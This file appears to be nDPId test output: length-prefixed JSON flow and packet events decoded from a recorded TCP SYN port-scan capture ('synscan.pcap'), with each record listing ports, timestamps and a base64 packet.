-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsjm8AADsGfwOsEAAIQA2GNIzTBCzdU4MZAAAAAGACEAAkYAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsNcIAADsG17CsEAAIQA2GNIzTAcrdU4MZAAAAAGACEAAmwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsQD4AAC8G2TSsEAAIQA2GNIzTCjDdU4MZAAAAAGACEAAeXAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsRiMAACwG1k+sEAAIQA2GNIzTF0DdU4MZAAAAAGACBAAdTAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsnG0AADEGewWsEAAIQA2GNIzTCVrdU4MZAAAAAGACCAAnMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsx\/4AACcGWXSsEAAIQA2GNIzTD6TdU4MZAAAAAGACEAAY6AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsd04AADEGoCSsEAAIQA2GNIzTAavdU4MZAAAAAGACCAAu4QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHoAADUGvvisEAAIQA2GNIzTrZrdU4MZAAAAAGACCACC8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsHa8AADMG98OsEAAIQA2GNIzTE9\/dU4MZAAAAAGACEAAUrQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs7BgAAC8GLVqsEAAIQA2GNIzTCIPdU4MZAAAAAGACEAAgCQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsqeUAADIGbI2sEAAIQA2GNIzSAFHdUoMYAAAAAGACDAAsPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsFL0AADgG+7WsEAAIQA2GNIzSDJXdUoMYAAAAAGACBAAn+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsrY4AADkGYeSsEAAIQA2GNIzSCf3dUoMYAAAAAGACCAAmkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsa9wAADQGqJasEAAIQA2GNIzSACXdUoMYAAAAAGACBAA0agAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs78gAACwGLKqsEAAIQA2GNIzSCFfdUoMYAAAAAGACBAAsOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv00AACwGXSWsEAAIQA2GNIzSCvndUoMYAAAAAGACBAAplgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs9QwAADoGGWasEAAIQA2GNIzSx5\/dUoMYAAAAAGACDABk7wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZkAAC0GUdmsEAAIQA2GNIzSDx\/dUoMYAAAAAGACCAAhcAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsVS8AADkGukOsEAAIQA2GNIzSAA3dUoMYAAAAAGACCAAwggAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv\/MAADkGT3+sEAAIQA2GNIzSFqndUoMYAAAAAGACCAAZ5gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsI4UAADEG8+2sEAAIQA2GNIzSDPrdUoMYAAAAAGACCAAjlQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060558,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_packet_id":1,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060558,"pkt":"ACYLMQczACWzv5HuCABFAAAsrqQAADcGYs6sEAAIQA2GNIzSB+XdUoMYAAAAAGACEAAgqgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060559,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_packet_id":1,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060559,"pkt":"ACYLMQczACWzv5HuCABFAAAsFrkAADkG+LmsEAAIQA2GNIzSDQXdUoMYAAAAAGACCAAjigAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAswpEAADIGU+GsEAAIQA2GNIzTB87dU4MZAAAAAGACDAAkvgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeIAAC8G65CsEAAIQA2GNIzTAaDdU4MZAAAAAGACEAAm7AAAAgQFtA=="} 